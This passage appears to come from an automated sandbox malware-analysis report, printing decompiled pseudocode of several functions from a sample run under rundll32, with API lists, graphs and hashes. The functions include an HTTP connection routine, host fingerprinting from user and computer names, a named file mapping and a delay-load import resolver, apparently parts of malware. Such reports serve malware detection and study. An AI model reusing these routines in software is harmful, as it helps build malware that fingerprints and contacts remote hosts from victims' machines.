							goto L21;
						} else {
							__eflags =  *0x421a2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E04215F6A();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x421a2e8);
								L21:
								L0421818A();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								__eflags = _t65;
								_v128 = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x421a2d8, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}
































                    0x04215458
                    0x0421546e
                    0x04215472
                    0x04215477
                    0x0421547e
                    0x04215486
                    0x0421548a
                    0x04215611
                    0x04215490
                    0x04215490
                    0x04215492
                    0x04215497
                    0x04215498
                    0x0421549e
                    0x042154a2
                    0x042154a6
                    0x042154b4
                    0x042154c2
                    0x042154c6
                    0x042154c8
                    0x042154d5
                    0x042154e1
                    0x042154e5
                    0x042154e9
                    0x042154f2
                    0x042154fd
                    0x042154fd
                    0x042154f4
                    0x042154f4
                    0x042154fb
                    0x00000000
                    0x00000000
                    0x042154fb
                    0x04215507
                    0x00000000
                    0x0421550b
                    0x04215510
                    0x0421551b
                    0x0421551b
                    0x04215523
                    0x04215529
                    0x04215531
                    0x0421553a
                    0x04215541
                    0x04215545
                    0x0421554c
                    0x04215550
                    0x00000000
                    0x00000000
                    0x04215552
                    0x04215556
                    0x04215559
                    0x0421555d
                    0x00000000
                    0x0421555f
                    0x0421556f
                    0x0421556f
                    0x00000000
                    0x042155a0
                    0x042155a0
                    0x042155a5
                    0x042155c4
                    0x042155c6
                    0x042155cb
                    0x042155cc
                    0x00000000
                    0x042155a7
                    0x042155a7
                    0x042155ad
                    0x00000000
                    0x042155af
                    0x042155af
                    0x042155b4
                    0x042155b6
                    0x042155bb
                    0x042155bc
                    0x042155d2
                    0x042155d2
                    0x042155da
                    0x042155e8
                    0x042155ec
                    0x042155f8
                    0x042155fa
                    0x042155fc
                    0x04215600
                    0x00000000
                    0x04215606
                    0x00000000
                    0x04215606
                    0x04215600
                    0x042155ad
                    0x00000000
                    0x042155a5
                    0x04215573
                    0x04215575
                    0x04215579
                    0x0421557a
                    0x0421557a
                    0x0421557e
                    0x04215588
                    0x04215588
                    0x0421558e
                    0x04215591
                    0x04215591
                    0x04215598
                    0x04215598
                    0x0421561f
                    0x00000000

                    APIs
                    • memset.NTDLL ref: 04215472
                    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0421547E
                    • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 042154A6
                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 042154C6
                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,042166F1,?), ref: 042154E1
                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,042166F1,?,00000000), ref: 04215588
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,042166F1,?,00000000,?,?), ref: 04215598
                    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 042155D2
                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 042155EC
                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 042155F8
                      • Part of subcall function 04213399: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04A993D8,00000000,?,74E5F710,00000000,74E5F730), ref: 042133E8
                      • Part of subcall function 04213399: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04A99410,?,00000000,30314549,00000014,004F0053,04A993CC), ref: 04213485
                      • Part of subcall function 04213399: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,042154F9), ref: 04213497
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,042166F1,?,00000000,?,?), ref: 0421560B
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                    • String ID: Ut
                    • API String ID: 3521023985-8415677
                    • Opcode ID: dd54a40172a0cd71dac12e65b8fbb362b0c0b06ee6b889b0eeefb15a54133ab2
                    • Instruction ID: dc82949ca7eff64809fda7ccd2a8477be4e83a180a567fb707d3c392832be7ca
                    • Opcode Fuzzy Hash: dd54a40172a0cd71dac12e65b8fbb362b0c0b06ee6b889b0eeefb15a54133ab2
                    • Instruction Fuzzy Hash: 9E51DFB1618321BFD710DF19DC44D6BBBE9EF94364F104A1AF4A5821A0DB74E980CF92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04217A34 Relevance: 19.6, APIs: 13, Instructions: 126networkstringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 92%
                    			E04217A34(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E042163FD(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E042117AB(_t56);
					} else {
						E042117AB( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E042179C9) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E04215867( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x421a320; // 0x87d5a8
						_t15 = _t59 + 0x421b743; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65);
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}














                    0x04217a34
                    0x04217a34
                    0x04217a3f
                    0x04217a46
                    0x04217a4e
                    0x04217a58
                    0x04217a5e
                    0x04217a71
                    0x04217a81
                    0x04217a73
                    0x04217a76
                    0x04217a7b
                    0x04217a7b
                    0x04217a71
                    0x04217a91
                    0x04217a99
                    0x04217a9c
                    0x04217b85
                    0x00000000
                    0x04217ab7
                    0x04217aba
                    0x04217acd
                    0x04217ad5
                    0x04217ad8
                    0x04217b00
                    0x04217b13
                    0x04217b1d
                    0x04217b20
                    0x04217b28
                    0x04217b2b
                    0x00000000
                    0x00000000
                    0x04217b2f
                    0x04217b3b
                    0x04217b4c
                    0x04217b4e
                    0x04217b5f
                    0x04217b5f
                    0x04217b6f
                    0x00000000
                    0x04217b81
                    0x00000000
                    0x04217b81
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04217ad8

                    APIs
                    • lstrlen.KERNEL32(?,00000008,74E04D40), ref: 04217A46
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 04217A69
                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 04217A91
                    • InternetSetStatusCallback.WININET(00000000,042179C9), ref: 04217AA8
                    • ResetEvent.KERNEL32(?), ref: 04217ABA
                    • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 04217ACD
                    • GetLastError.KERNEL32 ref: 04217ADA
                    • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 04217B20
                    • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 04217B3E
                    • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 04217B5F
                    • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 04217B6B
                    • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 04217B7B
                    • GetLastError.KERNEL32 ref: 04217B85
                      • Part of subcall function 042117AB: HeapFree.KERNEL32(00000000,00000000,04212976,00000000,?,?,00000000), ref: 042117B7
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                    • String ID:
                    • API String ID: 2290446683-0
                    • Opcode ID: ef3397cd7cd50ddcae844b32e6afa7025d90eb22d40f67f1414f2d8093b99090
                    • Instruction ID: 3cc49194234c0dda092a2d3ce0f6d4a97fd636d44a5cec15378a7f8a2b958ce2
                    • Opcode Fuzzy Hash: ef3397cd7cd50ddcae844b32e6afa7025d90eb22d40f67f1414f2d8093b99090
                    • Instruction Fuzzy Hash: E4415C71710205BBD7219F69EC8CE6BBAFDEFE5710B100929F502D21A0EB74AA44CA60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04217E75 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 189 4217e75-4217eda 190 4217efb-4217f25 189->190 191 4217edc-4217ef6 RaiseException 189->191 193 4217f27 190->193 194 4217f2a-4217f36 190->194 192 42180ab-42180af 191->192 193->194 195 4217f49-4217f4b 194->195 196 4217f38-4217f43 194->196 197 4217f51-4217f58 195->197 198 4217ff3-4217ffd 195->198 196->195 208 421808e-4218095 196->208 202 4217f68-4217f75 LoadLibraryA 197->202 203 4217f5a-4217f66 197->203 200 4218009-421800b 198->200 201 4217fff-4218007 198->201 204 4218089-421808c 200->204 205 421800d-4218010 200->205 201->200 206 4217f77-4217f87 GetLastError 202->206 207 4217fb8-4217fc4 InterlockedExchange 202->207 203->202 203->207 204->208 213 4218012-4218015 205->213 214 421803e-421804c GetProcAddress 205->214 215 4217f97-4217fb3 RaiseException 206->215 216 4217f89-4217f95 206->216 217 4217fc6-4217fca 207->217 218 4217fec-4217fed FreeLibrary 207->218 211 4218097-42180a4 208->211 212 42180a9 208->212 211->212 212->192 213->214 219 4218017-4218022 213->219 214->204 220 421804e-421805e GetLastError 214->220 215->192 216->207 216->215 217->198 221 4217fcc-4217fd8 LocalAlloc 217->221 218->198 219->214 222 4218024-421802a 219->222 224 4218060-4218068 220->224 225 421806a-421806c 220->225 221->198 226 4217fda-4217fea 221->226 222->214 227 421802c-421802f 222->227 224->225 225->204 228 421806e-4218086 RaiseException 225->228 226->198 227->214 229 4218031-421803c 227->229 228->204 229->204 229->214
                    C-Code - Quality: 51%
                    			E04217E75(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4210000;
				_t115 = _t139[3] + 0x4210000;
				_t131 = _t139[4] + 0x4210000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4210000;
				_v16 = _t139[5] + 0x4210000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4210002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x421a1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x421a1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x421a1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x421a1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x421a1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x421a1b8; // 0x0
										 *_t102 = _t125;
										 *0x421a1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x421a1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                    0x04217e84
                    0x04217e9a
                    0x04217ea0
                    0x04217ea2
                    0x04217ea7
                    0x04217ead
                    0x04217eb2
                    0x04217eb5
                    0x04217ec3
                    0x04217eca
                    0x04217ecd
                    0x04217ed0
                    0x04217ed1
                    0x04217ed4
                    0x04217ed7
                    0x04217eda
                    0x04217edf
                    0x04217eee
                    0x00000000
                    0x04217ef4
                    0x04217efe
                    0x04217f08
                    0x04217f0d
                    0x04217f0f
                    0x04217f19
                    0x04217f1c
                    0x04217f1f
                    0x04217f25
                    0x04217f27
                    0x04217f27
                    0x04217f2a
                    0x04217f2d
                    0x04217f32
                    0x04217f36
                    0x04217f49
                    0x04217f4b
                    0x04217ff3
                    0x04217ff3
                    0x04217ffa
                    0x04217ffd
                    0x04218007
                    0x04218007
                    0x0421800b
                    0x04218089
                    0x0421808c
                    0x0421808e
                    0x0421808e
                    0x04218095
                    0x04218097
                    0x042180a1
                    0x042180a4
                    0x042180a7
                    0x042180a7
                    0x00000000
                    0x0421800d
                    0x04218010
                    0x0421803e
                    0x04218048
                    0x0421804c
                    0x04218054
                    0x04218057
                    0x0421805e
                    0x04218068
                    0x04218068
                    0x0421806c
                    0x04218071
                    0x04218080
                    0x04218086
                    0x04218086
                    0x0421806c
                    0x00000000
                    0x04218017
                    0x0421801a
                    0x04218022
                    0x04218037
                    0x0421803c
                    0x00000000
                    0x00000000
                    0x0421803c
                    0x00000000
                    0x04218022
                    0x04218010
                    0x0421800b
                    0x04217f51
                    0x04217f58
                    0x04217f68
                    0x04217f6b
                    0x04217f71
                    0x04217f75
                    0x04217fb8
                    0x04217fc4
                    0x04217fed
                    0x04217fc6
                    0x04217fca
                    0x04217fd0
                    0x04217fd8
                    0x04217fda
                    0x04217fdd
                    0x04217fe3
                    0x04217fe5
                    0x04217fe5
                    0x04217fd8
                    0x04217fca
                    0x00000000
                    0x04217fc4
                    0x04217f7d
                    0x04217f80
                    0x04217f87
                    0x04217f97
                    0x04217f9a
                    0x04217faa
                    0x00000000
                    0x04217fb0
                    0x04217f91
                    0x04217f95
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04217f95
                    0x04217f62
                    0x04217f66
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04217f66
                    0x04217f3f
                    0x04217f43
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04217EEE
                    • LoadLibraryA.KERNEL32(?), ref: 04217F6B
                    • GetLastError.KERNEL32 ref: 04217F77
                    • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04217FAA
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                    • String ID: $
                    • API String ID: 948315288-3993045852
                    • Opcode ID: 52e48b737bbc01d82cbccede95101270c8b4072c9930cbf710aaf4405e56b293
                    • Instruction ID: d9e0fcf9e0fc8e1dc99ea867ff9179e4529d5f74088de456c160b0b61c9e666a
                    • Opcode Fuzzy Hash: 52e48b737bbc01d82cbccede95101270c8b4072c9930cbf710aaf4405e56b293
                    • Instruction Fuzzy Hash: E9813F71B1120A9FDB20DF98D894AAEB7F5FFA8350F148029E905D7350EBB4E945CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 042121BC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 231 42121bc-42121d0 232 42121d2-42121d7 231->232 233 42121da-42121ec call 4215894 231->233 232->233 236 4212240-421224d 233->236 237 42121ee-42121fe GetUserNameW 233->237 238 421224f-4212266 GetComputerNameW 236->238 237->238 239 4212200-4212210 RtlAllocateHeap 237->239 240 42122a4-42122c6 238->240 241 4212268-4212279 RtlAllocateHeap 238->241 239->238 242 4212212-421221f GetUserNameW 239->242 241->240 243 421227b-4212284 GetComputerNameW 241->243 244 4212221-421222d call 42152a9 242->244 245 421222f-421223e 242->245 247 4212295-4212298 243->247 248 4212286-4212292 call 42152a9 243->248 244->245 245->238 247->240 248->247
                    C-Code - Quality: 96%
                    			E042121BC(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x421a310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E04215894( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x421a31c ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x421a2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E042152A9(_v8 + _v8, _t63);
							}
							HeapFree( *0x421a2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x421a2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E042152A9(_v8 + _v8, _t63);
						}
						HeapFree( *0x421a2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                    0x042121bc
                    0x042121c4
                    0x042121ca
                    0x042121cd
                    0x042121d0
                    0x042121d2
                    0x042121d7
                    0x042121d7
                    0x042121dd
                    0x042121df
                    0x042121ec
                    0x0421224d
                    0x042121ee
                    0x042121f3
                    0x042121f9
                    0x042121fe
                    0x0421220c
                    0x04212210
                    0x0421221f
                    0x04212226
                    0x0421222d
                    0x0421222d
                    0x04212238
                    0x04212238
                    0x04212210
                    0x042121fe
                    0x0421224f
                    0x04212255
                    0x0421225f
                    0x04212261
                    0x04212266
                    0x04212275
                    0x04212279
                    0x04212284
                    0x0421228b
                    0x04212292
                    0x04212292
                    0x0421229e
                    0x0421229e
                    0x04212279
                    0x042122a7
                    0x042122a9
                    0x042122ac
                    0x042122ae
                    0x042122b1
                    0x042122b4
                    0x042122be
                    0x042122c2
                    0x042122c6

                    APIs
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 042121F3
                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 0421220A
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04212217
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04212238
                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0421225F
                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04212273
                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04212280
                    • HeapFree.KERNEL32(00000000,00000000), ref: 0421229E
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: HeapName$AllocateComputerFreeUser
                    • String ID: Ut
                    • API String ID: 3239747167-8415677
                    • Opcode ID: 06791abc597c3cc1b797da358ef3488f3f5000aeb79147ca4e97dcd7c80beb74
                    • Instruction ID: ff27dc516299d6208687db497fd9d24e6529ab435e0ba4631818ff7d9f478c5e
                    • Opcode Fuzzy Hash: 06791abc597c3cc1b797da358ef3488f3f5000aeb79147ca4e97dcd7c80beb74
                    • Instruction Fuzzy Hash: AD310D71B10205EFDB11DFA9EC84A6EB7F9EB64310F104469E405E7220DF74EE459B20
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0421414A Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 74%
                    			E0421414A(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04218184();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x421a320; // 0x87d5a8
				_t5 = _t13 + 0x421b87e; // 0x4a98e26
				_t6 = _t13 + 0x421b59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04217DEA();
				_t17 = CreateFileMappingW(0xffffffff, 0x421a34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                    0x0421414a
                    0x04214152
                    0x04214156
                    0x0421415c
                    0x04214161
                    0x04214166
                    0x04214169
                    0x0421416c
                    0x04214171
                    0x04214172
                    0x04214175
                    0x0421417a
                    0x04214181
                    0x0421418b
                    0x0421418d
                    0x0421418e
                    0x04214191
                    0x042141ad
                    0x042141b3
                    0x042141b7
                    0x04214205
                    0x042141b9
                    0x042141c6
                    0x042141d6
                    0x042141de
                    0x042141f0
                    0x042141f4
                    0x00000000
                    0x00000000
                    0x042141e0
                    0x042141e3
                    0x042141e8
                    0x042141ea
                    0x042141ea
                    0x042141c8
                    0x042141ca
                    0x042141f6
                    0x042141f7
                    0x042141f7
                    0x042141c6
                    0x0421420c

                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,042165C3,?,?,4D283A53,?,?), ref: 04214156
                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0421416C
                    • _snwprintf.NTDLL ref: 04214191
                    • CreateFileMappingW.KERNELBASE(000000FF,0421A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 042141AD
                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,042165C3,?,?,4D283A53,?), ref: 042141BF
                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 042141D6
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,042165C3,?,?,4D283A53), ref: 042141F7
                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,042165C3,?,?,4D283A53,?), ref: 042141FF
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
